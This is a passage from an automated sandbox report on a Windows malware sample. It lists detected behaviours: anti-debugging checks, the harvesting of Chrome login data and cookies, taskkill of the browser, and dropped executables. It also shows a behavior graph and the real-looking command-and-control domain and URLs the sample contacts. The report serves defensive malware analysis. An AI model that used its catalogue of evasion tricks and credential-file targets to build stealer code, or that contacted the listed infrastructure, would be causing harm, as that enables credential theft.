DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000003.00000003.280864826.00000000042B0000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000005.00000003.264420298.0000000002D74000.00000004.00000040.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent, 3_2_10019FF0
Hides threads from debuggers
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugFlags Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004EFAF0 rdtsc 1_2_004EFAF0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001A010 IsDebuggerPresent, 3_2_1001A010
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_00414280
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019DE0 mov eax, dword ptr fs:[00000030h] 3_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019E10 mov eax, dword ptr fs:[00000030h] 3_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019E10 mov eax, dword ptr fs:[00000030h] 3_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h] 3_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h] 3_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019ED0 mov eax, dword ptr fs:[00000030h] 3_2_10019ED0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004EE116 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,InterlockedPopEntrySList,VirtualAlloc,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList, 1_2_004EE116
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0040D290 EnterCriticalSection,std::_Xinvalid_argument,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler, 1_2_0040D290
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0040D340 GetCurrentThreadId,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection, 1_2_0040D340
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_0040D300 SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection, 1_2_0040D300
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10015354 SetUnhandledExceptionFilter,__encode_pointer, 3_2_10015354
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10015376 __decode_pointer,SetUnhandledExceptionFilter, 3_2_10015376
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 3_2_10018413
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00DB1C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB461F SetUnhandledExceptionFilter, 23_2_00DB461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00DB631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00DB373A

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError, 3_2_1001A0F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00411380 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00411380

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001779F cpuid 3_2_1001779F
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: _memset,RegCloseKey,_memset,GetLocaleInfoW, 1_2_00443060
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: GetLocaleInfoA, 3_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA, 23_2_00DB7189
Queries device information via Setup API
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 3_2_10019780
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004415F0 GetSystemTime,RegSetValueExW, 1_2_004415F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004C8360 LookupAccountNameW,GetLastError,LookupAccountNameW,CopySid, 1_2_004C8360
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00463240 GetVersionExW, 1_2_00463240
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346123 Sample: N1yprTBBXs Startdate: 29/01/2021 Architecture: WINDOWS Score: 93 93 Malicious sample detected (through community Yara rule) 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 Uses ping.exe to sleep 2->97 99 3 other signatures 2->99 8 N1yprTBBXs.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 71 84cfba021a5a6662.xyz 172.67.208.74, 49716, 49718, 49720 CLOUDFLARENETUS United States 8->71 67 C:\Users\user\...\6272167835D47591.exe, PE32 8->67 dropped 69 C:\...\6272167835D47591.exe:Zone.Identifier, ASCII 8->69 dropped 101 Detected unpacking (creates a PE file in dynamic memory) 8->101 103 Installs new ROOT certificates 8->103 105 Tries to detect virtualization through RDTSC time measurements 8->105 107 Hides threads from debuggers 8->107 15 6272167835D47591.exe 26 8->15         started        20 6272167835D47591.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 73 84cfba021a5a6662.xyz 15->73 75 84CFBA021A5A6662.xyz 15->75 53 C:\Users\user\AppData\...\1611969895131.exe, PE32 15->53 dropped 55 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->55 dropped 57 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->57 dropped 65 7 other files (none is malicious) 15->65 dropped 81 Multi AV Scanner detection for dropped file 15->81 83 Detected unpacking (creates a PE file in dynamic memory) 15->83 85 Machine Learning detection for dropped file 15->85 91 5 other signatures 15->91 26 cmd.exe 15->26         started        29 1611969895131.exe 2 15->29         started        31 ThunderFW.exe 1 15->31         started        77 84cfba021a5a6662.xyz 20->77 59 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->59 dropped 61 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->61 dropped 87 Tries to harvest and steal browser information (history, passwords, etc) 20->87 33 cmd.exe 1 20->33         started        35 cmd.exe 1 20->35         started        79 127.0.0.1 unknown unknown 22->79 89 Uses ping.exe to sleep 22->89 37 conhost.exe 22->37         started        39 PING.EXE 1 22->39         started        63 C:\Users\user\AppData\Local\...\MSIE145.tmp, PE32 24->63 dropped file9 signatures10 process11 signatures12 41 conhost.exe 26->41         started        43 PING.EXE 26->43         started        109 Uses ping.exe to sleep 33->109 45 conhost.exe 33->45         started        47 PING.EXE 1 33->47         started        49 taskkill.exe 1 35->49         started        51 conhost.exe 35->51         started        process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.208.74
 unknown United States
13335 CLOUDFLARENETUS false

Private
IP
127.0.0.1

Contacted Domains

Name IP Active
84CFBA021A5A6662.xyz 172.67.208.74 true
84cfba021a5a6662.xyz 172.67.208.74 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://84cfba021a5a6662.xyz/info_old/g false
  • Avira URL Cloud: safe
 unknown
http://84cfba021a5a6662.xyz/info_old/e false
  • Avira URL Cloud: safe
 unknown
http://84cfba021a5a6662.xyz/info_old/w false
  • Avira URL Cloud: safe
 unknown
http://84cfba021a5a6662.xyz/info_old/r false
  • Avira URL Cloud: safe
 unknown
http://84CFBA021A5A6662.xyz/info_old/ddd false
  • Avira URL Cloud: safe
 unknown